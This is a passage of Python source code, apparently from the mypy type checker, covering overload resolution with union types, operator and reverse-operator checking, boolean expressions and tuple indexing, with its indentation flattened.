# Step 2: If the arguments contain a union, we try performing union math first,
# instead of picking the first matching overload.
# This is because picking the first overload often ends up being too greedy:
# for example, when we have a fallback alternative that accepts an unrestricted
# typevar. See https://github.com/python/mypy/issues/4063 for related discussion.
erased_targets = None # type: Optional[List[CallableType]]
unioned_result = None # type: Optional[Tuple[Type, Type]]
union_interrupted = False # did we try all union combinations?
if any(self.real_union(arg) for arg in arg_types):
unioned_errors = arg_messages.clean_copy()
try:
unioned_return = self.union_overload_result(plausible_targets, args,
arg_types, arg_kinds, arg_names,
callable_name, object_type,
context,
arg_messages=unioned_errors)
except TooManyUnions:
union_interrupted = True
else:
# Record if we succeeded. Next we need to see if maybe normal procedure
# gives a narrower type.
if unioned_return:
returns, inferred_types = zip(*unioned_return)
# Note that we use `combine_function_signatures` instead of just returning
# a union of inferred callables because for example a call
# Union[int -> int, str -> str](Union[int, str]) is invalid and
# we don't want to introduce internal inconsistencies.
unioned_result = (UnionType.make_simplified_union(list(returns),
context.line,
context.column),
self.combine_function_signatures(inferred_types))
# Step 3: We try checking each branch one-by-one.
inferred_result = self.infer_overload_return_type(plausible_targets, args, arg_types,
arg_kinds, arg_names, callable_name,
object_type, context, arg_messages)
# If any of checks succeed, stop early.
if inferred_result is not None and unioned_result is not None:
# Both unioned and direct checks succeeded, choose the more precise type.
if (is_subtype(inferred_result[0], unioned_result[0]) and
not isinstance(inferred_result[0], AnyType)):
return inferred_result
return unioned_result
elif unioned_result is not None:
return unioned_result
elif inferred_result is not None:
return inferred_result
# Step 4: Failure. At this point, we know there is no match. We fall back to trying
# to find a somewhat plausible overload target using the erased types
# so we can produce a nice error message.
#
# For example, suppose the user passes a value of type 'List[str]' into an
# overload with signatures f(x: int) -> int and f(x: List[int]) -> List[int].
#
# Neither alternative matches, but we can guess the user probably wants the
# second one.
erased_targets = self.overload_erased_call_targets(plausible_targets, arg_types,
arg_kinds, arg_names, context)
# Step 5: We try and infer a second-best alternative if possible. If not, fall back
# to using 'Any'.
if len(erased_targets) > 0:
# Pick the first plausible erased target as the fallback
# TODO: Adjust the error message here to make it clear there was no match.
# In order to do this, we need to find a clean way of associating
# a note with whatever error message 'self.check_call' will generate.
# In particular, the note's line and column numbers need to be the same
# as the error's.
target = erased_targets[0] # type: Type
else:
# There was no plausible match: give up
target = AnyType(TypeOfAny.from_error)
if not self.chk.should_suppress_optional_error(arg_types):
arg_messages.no_variant_matches_arguments(
plausible_targets, callee, arg_types, context)
result = self.check_call(target, args, arg_kinds, context, arg_names,
arg_messages=arg_messages,
callable_name=callable_name,
object_type=object_type)
if union_interrupted:
self.chk.msg.note("Not all union combinations were tried"
" because there are too many unions", context)
return result
def plausible_overload_call_targets(self,
arg_types: List[Type],
arg_kinds: List[int],
arg_names: Optional[Sequence[Optional[str]]],
overload: Overloaded) -> List[CallableType]:
"""Returns all overload call targets that having matching argument counts.
If the given args contains a star-arg (*arg or **kwarg argument), this method
will ensure all star-arg overloads appear at the start of the list, instead
of their usual location.
The only exception is if the starred argument is something like a Tuple or a
NamedTuple, which has a definitive "shape". If so, we don't move the corresponding
alternative to the front since we can infer a more precise match using the original
order."""
def has_shape(typ: Type) -> bool:
# TODO: Once https://github.com/python/mypy/issues/5198 is fixed,
# add 'isinstance(typ, TypedDictType)' somewhere below.
return (isinstance(typ, TupleType)
or (isinstance(typ, Instance) and typ.type.is_named_tuple))
matches = [] # type: List[CallableType]
star_matches = [] # type: List[CallableType]
args_have_var_arg = False
args_have_kw_arg = False
for kind, typ in zip(arg_kinds, arg_types):
if kind == ARG_STAR and not has_shape(typ):
args_have_var_arg = True
if kind == ARG_STAR2 and not has_shape(typ):
args_have_kw_arg = True
for typ in overload.items():
formal_to_actual = map_actuals_to_formals(arg_kinds, arg_names,
typ.arg_kinds, typ.arg_names,
lambda i: arg_types[i])
if self.check_argument_count(typ, arg_types, arg_kinds, arg_names,
formal_to_actual, None, None):
if args_have_var_arg and typ.is_var_arg:
star_matches.append(typ)
elif args_have_kw_arg and typ.is_kw_arg:
star_matches.append(typ)
else:
matches.append(typ)
return star_matches + matches
def infer_overload_return_type(self,
plausible_targets: List[CallableType],
args: List[Expression],
arg_types: List[Type],
arg_kinds: List[int],
arg_names: Optional[Sequence[Optional[str]]],
callable_name: Optional[str],
object_type: Optional[Type],
context: Context,
arg_messages: Optional[MessageBuilder] = None,
) -> Optional[Tuple[Type, Type]]:
"""Attempts to find the first matching callable from the given list.
If a match is found, returns a tuple containing the result type and the inferred
callee type. (This tuple is meant to be eventually returned by check_call.)
If multiple targets match due to ambiguous Any parameters, returns (AnyType, AnyType).
If no targets match, returns None.
Assumes all of the given targets have argument counts compatible with the caller.
"""
arg_messages = self.msg if arg_messages is None else arg_messages
matches = [] # type: List[CallableType]
return_types = [] # type: List[Type]
inferred_types = [] # type: List[Type]
args_contain_any = any(map(has_any_type, arg_types))
for typ in plausible_targets:
overload_messages = self.msg.clean_copy()
prev_messages = self.msg
assert self.msg is self.chk.msg
self.msg = overload_messages
self.chk.msg = overload_messages
try:
# Passing `overload_messages` as the `arg_messages` parameter doesn't
# seem to reliably catch all possible errors.
# TODO: Figure out why
ret_type, infer_type = self.check_call(
callee=typ,
args=args,
arg_kinds=arg_kinds,
arg_names=arg_names,
context=context,
arg_messages=overload_messages,
callable_name=callable_name,
object_type=object_type)
finally:
self.chk.msg = prev_messages
self.msg = prev_messages
is_match = not overload_messages.is_errors()
if is_match:
# Return early if possible; otherwise record info so we can
# check for ambiguity due to 'Any' below.
if not args_contain_any:
return ret_type, infer_type
matches.append(typ)
return_types.append(ret_type)
inferred_types.append(infer_type)
if len(matches) == 0:
# No match was found
return None
elif any_causes_overload_ambiguity(matches, return_types, arg_types, arg_kinds, arg_names):
# An argument of type or containing the type 'Any' caused ambiguity.
# We try returning a precise type if we can. If not, we give up and just return 'Any'.
if all_same_types(return_types):
return return_types[0], inferred_types[0]
elif all_same_types(erase_type(typ) for typ in return_types):
return erase_type(return_types[0]), erase_type(inferred_types[0])
else:
return self.check_call(callee=AnyType(TypeOfAny.special_form),
args=args,
arg_kinds=arg_kinds,
arg_names=arg_names,
context=context,
arg_messages=arg_messages,
callable_name=callable_name,
object_type=object_type)
else:
# Success! No ambiguity; return the first match.
return return_types[0], inferred_types[0]
def overload_erased_call_targets(self,
plausible_targets: List[CallableType],
arg_types: List[Type],
arg_kinds: List[int],
arg_names: Optional[Sequence[Optional[str]]],
context: Context) -> List[CallableType]:
"""Returns a list of all targets that match the caller after erasing types.
Assumes all of the given targets have argument counts compatible with the caller.
"""
matches = [] # type: List[CallableType]
for typ in plausible_targets:
if self.erased_signature_similarity(arg_types, arg_kinds, arg_names, typ, context):
matches.append(typ)
return matches
def union_overload_result(self,
plausible_targets: List[CallableType],
args: List[Expression],
arg_types: List[Type],
arg_kinds: List[int],
arg_names: Optional[Sequence[Optional[str]]],
callable_name: Optional[str],
object_type: Optional[Type],
context: Context,
arg_messages: Optional[MessageBuilder] = None,
level: int = 0
) -> Optional[List[Tuple[Type, Type]]]:
"""Accepts a list of overload signatures and attempts to match calls by destructuring
the first union.
Return a list of (<return type>, <inferred variant type>) if call succeeds for every
item of the desctructured union. Returns None if there is no match.
"""
# Step 1: If we are already too deep, then stop immediately. Otherwise mypy might
# hang for long time because of a weird overload call. The caller will get
# the exception and generate an appropriate note message, if needed.
if level >= MAX_UNIONS:
raise TooManyUnions
# Step 2: Find position of the first union in arguments. Return the normal inferred
# type if no more unions left.
for idx, typ in enumerate(arg_types):
if self.real_union(typ):
break
else:
# No unions in args, just fall back to normal inference
with self.type_overrides_set(args, arg_types):
res = self.infer_overload_return_type(plausible_targets, args, arg_types,
arg_kinds, arg_names, callable_name,
object_type, context, arg_messages)
if res is not None:
return [res]
return None
# Step 3: Try a direct match before splitting to avoid unnecessary union splits
# and save performance.
with self.type_overrides_set(args, arg_types):
direct = self.infer_overload_return_type(plausible_targets, args, arg_types,
arg_kinds, arg_names, callable_name,
object_type, context, arg_messages)
if direct is not None and not isinstance(direct[0], (UnionType, AnyType)):
# We only return non-unions soon, to avoid greedy match.
return [direct]
# Step 4: Split the first remaining union type in arguments into items and
# try to match each item individually (recursive).
first_union = arg_types[idx]
assert isinstance(first_union, UnionType)
res_items = []
for item in first_union.relevant_items():
new_arg_types = arg_types.copy()
new_arg_types[idx] = item
sub_result = self.union_overload_result(plausible_targets, args, new_arg_types,
arg_kinds, arg_names, callable_name,
object_type, context, arg_messages,
level + 1)
if sub_result is not None:
res_items.extend(sub_result)
else:
# Some item doesn't match, return soon.
return None
# Step 5: If splitting succeeded, then filter out duplicate items before returning.
seen = set() # type: Set[Tuple[Type, Type]]
result = []
for pair in res_items:
if pair not in seen:
seen.add(pair)
result.append(pair)
return result
def real_union(self, typ: Type) -> bool:
return isinstance(typ, UnionType) and len(typ.relevant_items()) > 1
@contextmanager
def type_overrides_set(self, exprs: Sequence[Expression],
overrides: Sequence[Type]) -> Iterator[None]:
"""Set _temporary_ type overrides for given expressions."""
assert len(exprs) == len(overrides)
for expr, typ in zip(exprs, overrides):
self.type_overrides[expr] = typ
try:
yield
finally:
for expr in exprs:
del self.type_overrides[expr]
def combine_function_signatures(self, types: Sequence[Type]) -> Union[AnyType, CallableType]:
"""Accepts a list of function signatures and attempts to combine them together into a
new CallableType consisting of the union of all of the given arguments and return types.
If there is at least one non-callable type, return Any (this can happen if there is
an ambiguity because of Any in arguments).
"""
assert types, "Trying to merge no callables"
if not all(isinstance(c, CallableType) for c in types):
return AnyType(TypeOfAny.special_form)
callables = cast(Sequence[CallableType], types)
if len(callables) == 1:
return callables[0]
# Note: we are assuming here that if a user uses some TypeVar 'T' in
# two different functions, they meant for that TypeVar to mean the
# same thing.
#
# This function will make sure that all instances of that TypeVar 'T'
# refer to the same underlying TypeVarType and TypeVarDef objects to
# simplify the union-ing logic below.
#
# (If the user did *not* mean for 'T' to be consistently bound to the
# same type in their overloads, well, their code is probably too
# confusing and ought to be re-written anyways.)
callables, variables = merge_typevars_in_callables_by_name(callables)
new_args = [[] for _ in range(len(callables[0].arg_types))] # type: List[List[Type]]
new_kinds = list(callables[0].arg_kinds)
new_returns = [] # type: List[Type]
too_complex = False
for target in callables:
# We fall back to Callable[..., Union[<returns>]] if the functions do not have
# the exact same signature. The only exception is if one arg is optional and
# the other is positional: in that case, we continue unioning (and expect a
# positional arg).
# TODO: Enhance the merging logic to handle a wider variety of signatures.
if len(new_kinds) != len(target.arg_kinds):
too_complex = True
break
for i, (new_kind, target_kind) in enumerate(zip(new_kinds, target.arg_kinds)):
if new_kind == target_kind:
continue
elif new_kind in (ARG_POS, ARG_OPT) and target_kind in (ARG_POS, ARG_OPT):
new_kinds[i] = ARG_POS
else:
too_complex = True
break
if too_complex:
break # outer loop
for i, arg in enumerate(target.arg_types):
new_args[i].append(arg)
new_returns.append(target.ret_type)
union_return = UnionType.make_simplified_union(new_returns)
if too_complex:
any = AnyType(TypeOfAny.special_form)
return callables[0].copy_modified(
arg_types=[any, any],
arg_kinds=[ARG_STAR, ARG_STAR2],
arg_names=[None, None],
ret_type=union_return,
variables=variables,
implicit=True)
final_args = []
for args_list in new_args:
new_type = UnionType.make_simplified_union(args_list)
final_args.append(new_type)
return callables[0].copy_modified(
arg_types=final_args,
arg_kinds=new_kinds,
ret_type=union_return,
variables=variables,
implicit=True)
def erased_signature_similarity(self, arg_types: List[Type], arg_kinds: List[int],
arg_names: Optional[Sequence[Optional[str]]],
callee: CallableType,
context: Context) -> bool:
"""Determine whether arguments could match the signature at runtime, after
erasing types."""
formal_to_actual = map_actuals_to_formals(arg_kinds,
arg_names,
callee.arg_kinds,
callee.arg_names,
lambda i: arg_types[i])
if not self.check_argument_count(callee, arg_types, arg_kinds, arg_names,
formal_to_actual, None, None):
# Too few or many arguments -> no match.
return False
def check_arg(caller_type: Type, original_caller_type: Type, caller_kind: int,
callee_type: Type, n: int, m: int, callee: CallableType,
context: Context, messages: MessageBuilder) -> None:
if not arg_approximate_similarity(caller_type, callee_type):
# No match -- exit early since none of the remaining work can change
# the result.
raise Finished
try:
self.check_argument_types(arg_types, arg_kinds, callee,
formal_to_actual, context=context, check_arg=check_arg)
return True
except Finished:
return False
def apply_generic_arguments(self, callable: CallableType, types: Sequence[Optional[Type]],
context: Context, skip_unsatisfied: bool = False) -> CallableType:
"""Simple wrapper around mypy.applytype.apply_generic_arguments."""
return applytype.apply_generic_arguments(callable, types, self.msg, context,
skip_unsatisfied=skip_unsatisfied)
def visit_member_expr(self, e: MemberExpr, is_lvalue: bool = False) -> Type:
"""Visit member expression (of form e.id)."""
self.chk.module_refs.update(extract_refexpr_names(e))
result = self.analyze_ordinary_member_access(e, is_lvalue)
return self.narrow_type_from_binder(e, result)
def analyze_ordinary_member_access(self, e: MemberExpr,
is_lvalue: bool) -> Type:
"""Analyse member expression or member lvalue."""
if e.kind is not None:
# This is a reference to a module attribute.
return self.analyze_ref_expr(e)
else:
# This is a reference to a non-module attribute.
original_type = self.accept(e.expr)
member_type = analyze_member_access(
e.name, original_type, e, is_lvalue, False, False,
self.named_type, self.not_ready_callback, self.msg,
original_type=original_type, chk=self.chk)
return member_type
def analyze_external_member_access(self, member: str, base_type: Type,
context: Context) -> Type:
"""Analyse member access that is external, i.e. it cannot
refer to private definitions. Return the result type.
"""
# TODO remove; no private definitions in mypy
return analyze_member_access(member, base_type, context, False, False, False,
self.named_type, self.not_ready_callback, self.msg,
original_type=base_type, chk=self.chk)
def visit_int_expr(self, e: IntExpr) -> Type:
"""Type check an integer literal (trivial)."""
return self.named_type('builtins.int')
def visit_str_expr(self, e: StrExpr) -> Type:
"""Type check a string literal (trivial)."""
return self.named_type('builtins.str')
def visit_bytes_expr(self, e: BytesExpr) -> Type:
"""Type check a bytes literal (trivial)."""
return self.named_type('builtins.bytes')
def visit_unicode_expr(self, e: UnicodeExpr) -> Type:
"""Type check a unicode literal (trivial)."""
return self.named_type('builtins.unicode')
def visit_float_expr(self, e: FloatExpr) -> Type:
"""Type check a float literal (trivial)."""
return self.named_type('builtins.float')
def visit_complex_expr(self, e: ComplexExpr) -> Type:
"""Type check a complex literal."""
return self.named_type('builtins.complex')
def visit_ellipsis(self, e: EllipsisExpr) -> Type:
"""Type check '...'."""
if self.chk.options.python_version[0] >= 3:
return self.named_type('builtins.ellipsis')
else:
# '...' is not valid in normal Python 2 code, but it can
# be used in stubs. The parser makes sure that we only
# get this far if we are in a stub, and we can safely
# return 'object' as ellipsis is special cased elsewhere.
# The builtins.ellipsis type does not exist in Python 2.
return self.named_type('builtins.object')
def visit_op_expr(self, e: OpExpr) -> Type:
"""Type check a binary operator expression."""
if e.op == 'and' or e.op == 'or':
return self.check_boolean_op(e, e)
if e.op == '*' and isinstance(e.left, ListExpr):
# Expressions of form [...] * e get special type inference.
return self.check_list_multiply(e)
if e.op == '%':
pyversion = self.chk.options.python_version
if pyversion[0] == 3:
if isinstance(e.left, BytesExpr) and pyversion[1] >= 5:
return self.strfrm_checker.check_str_interpolation(e.left, e.right)
if isinstance(e.left, StrExpr):
return self.strfrm_checker.check_str_interpolation(e.left, e.right)
elif pyversion[0] <= 2:
if isinstance(e.left, (StrExpr, BytesExpr, UnicodeExpr)):
return self.strfrm_checker.check_str_interpolation(e.left, e.right)
left_type = self.accept(e.left)
if e.op in nodes.op_methods:
method = self.get_operator_method(e.op)
result, method_type = self.check_op(method, left_type, e.right, e,
allow_reverse=True)
e.method_type = method_type
return result
else:
raise RuntimeError('Unknown operator {}'.format(e.op))
def visit_comparison_expr(self, e: ComparisonExpr) -> Type:
"""Type check a comparison expression.
Comparison expressions are type checked consecutive-pair-wise
That is, 'a < b > c == d' is check as 'a < b and b > c and c == d'
"""
result = None # type: Optional[Type]
# Check each consecutive operand pair and their operator
for left, right, operator in zip(e.operands, e.operands[1:], e.operators):
left_type = self.accept(left)
method_type = None # type: Optional[mypy.types.Type]
if operator == 'in' or operator == 'not in':
right_type = self.accept(right) # always validate the right operand
# Keep track of whether we get type check errors (these won't be reported, they
# are just to verify whether something is valid typing wise).
local_errors = self.msg.copy()
local_errors.disable_count = 0
sub_result, method_type = self.check_method_call_by_name(
'__contains__', right_type, [left], [ARG_POS], e, local_errors)
if isinstance(right_type, PartialType):
# We don't really know if this is an error or not, so just shut up.
pass
elif (local_errors.is_errors() and
# is_valid_var_arg is True for any Iterable
self.is_valid_var_arg(right_type)):
_, itertype = self.chk.analyze_iterable_item_type(right)
method_type = CallableType(
[left_type],
[nodes.ARG_POS],
[None],
self.bool_type(),
self.named_type('builtins.function'))
sub_result = self.bool_type()
if not is_subtype(left_type, itertype):
self.msg.unsupported_operand_types('in', left_type, right_type, e)
else:
self.msg.add_errors(local_errors)
if operator == 'not in':
sub_result = self.bool_type()
elif operator in nodes.op_methods:
method = self.get_operator_method(operator)
sub_result, method_type = self.check_op(method, left_type, right, e,
allow_reverse=True)
elif operator == 'is' or operator == 'is not':
self.accept(right) # validate the right operand
sub_result = self.bool_type()
method_type = None
else:
raise RuntimeError('Unknown comparison operator {}'.format(operator))
e.method_types.append(method_type)
# Determine type of boolean-and of result and sub_result
if result is None:
result = sub_result
else:
result = join.join_types(result, sub_result)
assert result is not None
return result
def get_operator_method(self, op: str) -> str:
if op == '/' and self.chk.options.python_version[0] == 2:
# TODO also check for "from __future__ import division"
return '__div__'
else:
return nodes.op_methods[op]
def check_method_call_by_name(self,
method: str,
base_type: Type,
args: List[Expression],
arg_kinds: List[int],
context: Context,
local_errors: Optional[MessageBuilder] = None,
) -> Tuple[Type, Type]:
"""Type check a call to a named method on an object.
Return tuple (result type, inferred method type).
"""
local_errors = local_errors or self.msg
method_type = analyze_member_access(method, base_type, context, False, False, True,
self.named_type, self.not_ready_callback, local_errors,
original_type=base_type, chk=self.chk)
return self.check_method_call(
method, base_type, method_type, args, arg_kinds, context, local_errors)
def check_method_call(self,
method_name: str,
base_type: Type,
method_type: Type,
args: List[Expression],
arg_kinds: List[int],
context: Context,
local_errors: Optional[MessageBuilder] = None) -> Tuple[Type, Type]:
"""Type check a call to a method with the given name and type on an object.
Return tuple (result type, inferred method type).
"""
callable_name = self.method_fullname(base_type, method_name)
object_type = base_type if callable_name is not None else None
# Try to refine the method signature using plugin hooks before checking the call.
method_type = self.transform_callee_type(
callable_name, method_type, args, arg_kinds, context, object_type=object_type)
return self.check_call(method_type, args, arg_kinds,
context, arg_messages=local_errors,
callable_name=callable_name, object_type=object_type)
def check_op_reversible(self,
op_name: str,
left_type: Type,
left_expr: Expression,
right_type: Type,
right_expr: Expression,
context: Context,
msg: MessageBuilder) -> Tuple[Type, Type]:
def make_local_errors() -> MessageBuilder:
"""Creates a new MessageBuilder object."""
local_errors = msg.clean_copy()
local_errors.disable_count = 0
return local_errors
def lookup_operator(op_name: str, base_type: Type) -> Optional[Type]:
"""Looks up the given operator and returns the corresponding type,
if it exists."""
local_errors = make_local_errors()
# TODO: Remove this call and rely just on analyze_member_access
# Currently, it seems we still need this to correctly deal with
# things like metaclasses?
#
# E.g. see the pythoneval.testMetaclassOpAccessAny test case.
if not self.has_member(base_type, op_name):
return None
member = analyze_member_access(
name=op_name,
typ=base_type,
node=context,
is_lvalue=False,
is_super=False,
is_operator=True,
builtin_type=self.named_type,
not_ready_callback=self.not_ready_callback,
msg=local_errors,
original_type=base_type,
chk=self.chk,
)
if local_errors.is_errors():
return None
else:
return member
def lookup_definer(typ: Instance, attr_name: str) -> Optional[str]:
"""Returns the name of the class that contains the actual definition of attr_name.
So if class A defines foo and class B subclasses A, running
'get_class_defined_in(B, "foo")` would return the full name of A.
However, if B were to override and redefine foo, that method call would
return the full name of B instead.
If the attr name is not present in the given class or its MRO, returns None.
"""
for cls in typ.type.mro:
if cls.names.get(attr_name):
return cls.fullname()
return None
# If either the LHS or the RHS are Any, we can't really concluding anything
# about the operation since the Any type may or may not define an
# __op__ or __rop__ method. So, we punt and return Any instead.
if isinstance(left_type, AnyType):
any_type = AnyType(TypeOfAny.from_another_any, source_any=left_type)
return any_type, any_type
if isinstance(right_type, AnyType):
any_type = AnyType(TypeOfAny.from_another_any, source_any=right_type)
return any_type, any_type
# STEP 1:
# We start by getting the __op__ and __rop__ methods, if they exist.
rev_op_name = self.get_reverse_op_method(op_name)
left_op = lookup_operator(op_name, left_type)
right_op = lookup_operator(rev_op_name, right_type)
# STEP 2a:
# We figure out in which order Python will call the operator methods. As it
# turns out, it's not as simple as just trying to call __op__ first and
# __rop__ second.
#
# We store the determined order inside the 'variants_raw' variable,
# which records tuples containing the method, base type, and the argument.
bias_right = is_proper_subtype(right_type, left_type)
if op_name in nodes.op_methods_that_shortcut and is_same_type(left_type, right_type):
# When we do "A() + A()", for example, Python will only call the __add__ method,
# never the __radd__ method.
#
# This is the case even if the __add__ method is completely missing and the __radd__
# method is defined.
variants_raw = [
(left_op, left_type, right_expr)
]
elif (is_subtype(right_type, left_type)
and isinstance(left_type, Instance)
and isinstance(right_type, Instance)
and lookup_definer(left_type, op_name) != lookup_definer(right_type, rev_op_name)):
# When we do "A() + B()" where B is a subclass of B, we'll actually try calling
# B's __radd__ method first, but ONLY if B explicitly defines or overrides the
# __radd__ method.
#
# This mechanism lets subclasses "refine" the expected outcome of the operation, even
# if they're located on the RHS.
variants_raw = [
(right_op, right_type, left_expr),
(left_op, left_type, right_expr),
]
else:
# In all other cases, we do the usual thing and call __add__ first and
# __radd__ second when doing "A() + B()".
variants_raw = [
(left_op, left_type, right_expr),
(right_op, right_type, left_expr),
]
# STEP 2b:
# When running Python 2, we might also try calling the __cmp__ method.
is_python_2 = self.chk.options.python_version[0] == 2
if is_python_2 and op_name in nodes.ops_falling_back_to_cmp:
cmp_method = nodes.comparison_fallback_method
left_cmp_op = lookup_operator(cmp_method, left_type)
right_cmp_op = lookup_operator(cmp_method, right_type)
if bias_right:
variants_raw.append((right_cmp_op, right_type, left_expr))
variants_raw.append((left_cmp_op, left_type, right_expr))
else:
variants_raw.append((left_cmp_op, left_type, right_expr))
variants_raw.append((right_cmp_op, right_type, left_expr))
# STEP 3:
# We now filter out all non-existant operators. The 'variants' list contains
# all operator methods that are actually present, in the order that Python
# attempts to invoke them.
variants = [(op, obj, arg) for (op, obj, arg) in variants_raw if op is not None]
# STEP 4:
# We now try invoking each one. If an operation succeeds, end early and return
# the corresponding result. Otherwise, return the result and errors associated
# with the first entry.
errors = []
results = []
for method, obj, arg in variants:
local_errors = make_local_errors()
result = self.check_method_call(
op_name, obj, method, [arg], [ARG_POS], context, local_errors)
if local_errors.is_errors():
errors.append(local_errors)
results.append(result)
else:
return result
# STEP 4b:
# Sometimes, the variants list is empty. In that case, we fall-back to attempting to
# call the __op__ method (even though it's missing).
if not variants:
local_errors = make_local_errors()
result = self.check_method_call_by_name(
op_name, left_type, [right_expr], [ARG_POS], context, local_errors)
if local_errors.is_errors():
errors.append(local_errors)
results.append(result)
else:
# In theory, we should never enter this case, but it seems
# we sometimes do, when dealing with Type[...]? E.g. see
# check-classes.testTypeTypeComparisonWorks.
#
# This is probably related to the TODO in lookup_operator(...)
# up above.
#
# TODO: Remove this extra case
return result
msg.add_errors(errors[0])
if len(results) == 1:
return results[0]
else:
error_any = AnyType(TypeOfAny.from_error)
result = error_any, error_any
return result
def check_op(self, method: str, base_type: Type,
arg: Expression, context: Context,
allow_reverse: bool = False) -> Tuple[Type, Type]:
"""Type check a binary operation which maps to a method call.
Return tuple (result type, inferred operator method type).
"""
if allow_reverse:
left_variants = [base_type]
if isinstance(base_type, UnionType):
left_variants = [item for item in base_type.relevant_items()]
right_type = self.accept(arg)
# Step 1: We first try leaving the right arguments alone and destructure
# just the left ones. (Mypy can sometimes perform some more precise inference
# if we leave the right operands a union -- see testOperatorWithEmptyListAndSum.
msg = self.msg.clean_copy()
msg.disable_count = 0
all_results = []
all_inferred = []
for left_possible_type in left_variants:
result, inferred = self.check_op_reversible(
op_name=method,
left_type=left_possible_type,
left_expr=TempNode(left_possible_type),
right_type=right_type,
right_expr=arg,
context=context,
msg=msg)
all_results.append(result)
all_inferred.append(inferred)
if not msg.is_errors():
results_final = UnionType.make_simplified_union(all_results)
inferred_final = UnionType.make_simplified_union(all_inferred)
return results_final, inferred_final
# Step 2: If that fails, we try again but also destructure the right argument.
# This is also necessary to make certain edge cases work -- see
# testOperatorDoubleUnionInterwovenUnionAdd, for example.
# Note: We want to pass in the original 'arg' for 'left_expr' and 'right_expr'
# whenever possible so that plugins and similar things can introspect on the original
# node if possible.
#
# We don't do the same for the base expression because it could lead to weird
# type inference errors -- e.g. see 'testOperatorDoubleUnionSum'.
# TODO: Can we use `type_overrides_set()` here?
right_variants = [(right_type, arg)]
if isinstance(right_type, UnionType):
right_variants = [(item, TempNode(item)) for item in right_type.relevant_items()]
msg = self.msg.clean_copy()
msg.disable_count = 0
all_results = []
all_inferred = []
for left_possible_type in left_variants:
for right_possible_type, right_expr in right_variants:
result, inferred = self.check_op_reversible(
op_name=method,
left_type=left_possible_type,
left_expr=TempNode(left_possible_type),
right_type=right_possible_type,
right_expr=right_expr,
context=context,
msg=msg)
all_results.append(result)
all_inferred.append(inferred)
if msg.is_errors():
self.msg.add_errors(msg)
if len(left_variants) >= 2 and len(right_variants) >= 2:
self.msg.warn_both_operands_are_from_unions(context)
elif len(left_variants) >= 2:
self.msg.warn_operand_was_from_union("Left", base_type, context)
elif len(right_variants) >= 2:
self.msg.warn_operand_was_from_union("Right", right_type, context)
# See the comment in 'check_overload_call' for more details on why
# we call 'combine_function_signature' instead of just unioning the inferred
# callable types.
results_final = UnionType.make_simplified_union(all_results)
inferred_final = self.combine_function_signatures(all_inferred)
return results_final, inferred_final
else:
return self.check_method_call_by_name(
method=method,
base_type=base_type,
args=[arg],
arg_kinds=[ARG_POS],
context=context,
local_errors=self.msg,
)
def get_reverse_op_method(self, method: str) -> str:
if method == '__div__' and self.chk.options.python_version[0] == 2:
return '__rdiv__'
else:
return nodes.reverse_op_methods[method]
def check_boolean_op(self, e: OpExpr, context: Context) -> Type:
"""Type check a boolean operation ('and' or 'or')."""
# A boolean operation can evaluate to either of the operands.
# We use the current type context to guide the type inference of of
# the left operand. We also use the left operand type to guide the type
# inference of the right operand so that expressions such as
# '[1] or []' are inferred correctly.
ctx = self.type_context[-1]
left_type = self.accept(e.left, ctx)
assert e.op in ('and', 'or') # Checked by visit_op_expr
if e.op == 'and':
right_map, left_map = self.chk.find_isinstance_check(e.left)
restricted_left_type = false_only(left_type)
result_is_left = not left_type.can_be_true
elif e.op == 'or':
left_map, right_map = self.chk.find_isinstance_check(e.left)
restricted_left_type = true_only(left_type)
result_is_left = not left_type.can_be_false
if e.right_unreachable:
right_map = None
elif e.right_always:
left_map = None
# If right_map is None then we know mypy considers the right branch
# to be unreachable and therefore any errors found in the right branch
# should be suppressed.
if right_map is None:
self.msg.disable_errors()
try:
right_type = self.analyze_cond_branch(right_map, e.right, left_type)
finally:
if right_map is None:
self.msg.enable_errors()
if right_map is None:
# The boolean expression is statically known to be the left value
assert left_map is not None # find_isinstance_check guarantees this
return left_type
if left_map is None:
# The boolean expression is statically known to be the right value
assert right_map is not None # find_isinstance_check guarantees this
return right_type
if isinstance(restricted_left_type, UninhabitedType):
# The left operand can never be the result
return right_type
elif result_is_left:
# The left operand is always the result
return left_type
else:
return UnionType.make_simplified_union([restricted_left_type, right_type])
def check_list_multiply(self, e: OpExpr) -> Type:
"""Type check an expression of form '[...] * e'.
Type inference is special-cased for this common construct.
"""
right_type = self.accept(e.right)
if is_subtype(right_type, self.named_type('builtins.int')):
# Special case: [...] * <int value>. Use the type context of the
# OpExpr, since the multiplication does not affect the type.
left_type = self.accept(e.left, type_context=self.type_context[-1])
else:
left_type = self.accept(e.left)
result, method_type = self.check_op('__mul__', left_type, e.right, e)
e.method_type = method_type
return result
def visit_unary_expr(self, e: UnaryExpr) -> Type:
"""Type check an unary operation ('not', '-', '+' or '~')."""
operand_type = self.accept(e.expr)
op = e.op
if op == 'not':
result = self.bool_type() # type: Type
else:
method = nodes.unary_op_methods[op]
result, method_type = self.check_method_call_by_name(method, operand_type, [], [], e)
e.method_type = method_type
return result
def visit_index_expr(self, e: IndexExpr) -> Type:
"""Type check an index expression (base[index]).
It may also represent type application.
"""
result = self.visit_index_expr_helper(e)
return self.narrow_type_from_binder(e, result)
def visit_index_expr_helper(self, e: IndexExpr) -> Type:
if e.analyzed:
# It's actually a type application.
return self.accept(e.analyzed)
left_type = self.accept(e.base)
if isinstance(left_type, TupleType) and self.chk.in_checked_function():
# Special case for tuples. They return a more specific type when
# indexed by an integer literal.
index = e.index
if isinstance(index, SliceExpr):
return self.visit_tuple_slice_helper(left_type, index)
n = self._get_value(index)
if n is not None:
if n < 0:
n += len(left_type.items)
if n >= 0 and n < len(left_type.items):
return left_type.items[n]
else:
self.chk.fail(messages.TUPLE_INDEX_OUT_OF_RANGE, e)
return AnyType(TypeOfAny.from_error)
else:
return self.nonliteral_tuple_index_helper(left_type, index)
elif isinstance(left_type, TypedDictType):
return self.visit_typeddict_index_expr(left_type, e.index)
elif (isinstance(left_type, CallableType)
and left_type.is_type_obj() and left_type.type_object().is_enum):
return self.visit_enum_index_expr(left_type.type_object(), e.index, e)
else:
result, method_type = self.check_method_call_by_name(
'__getitem__', left_type, [e.index], [ARG_POS], e)
e.method_type = method_type
return result
def visit_tuple_slice_helper(self, left_type: TupleType, slic: SliceExpr) -> Type:
begin = None
end = None
stride = None
if slic.begin_index:
begin = self._get_value(slic.begin_index)
if begin is None:
return self.nonliteral_tuple_index_helper(left_type, slic)
if slic.end_index:
end = self._get_value(slic.end_index)
if end is None:
return self.nonliteral_tuple_index_helper(left_type, slic)
if slic.stride:
stride = self._get_value(slic.stride)
if stride is None:
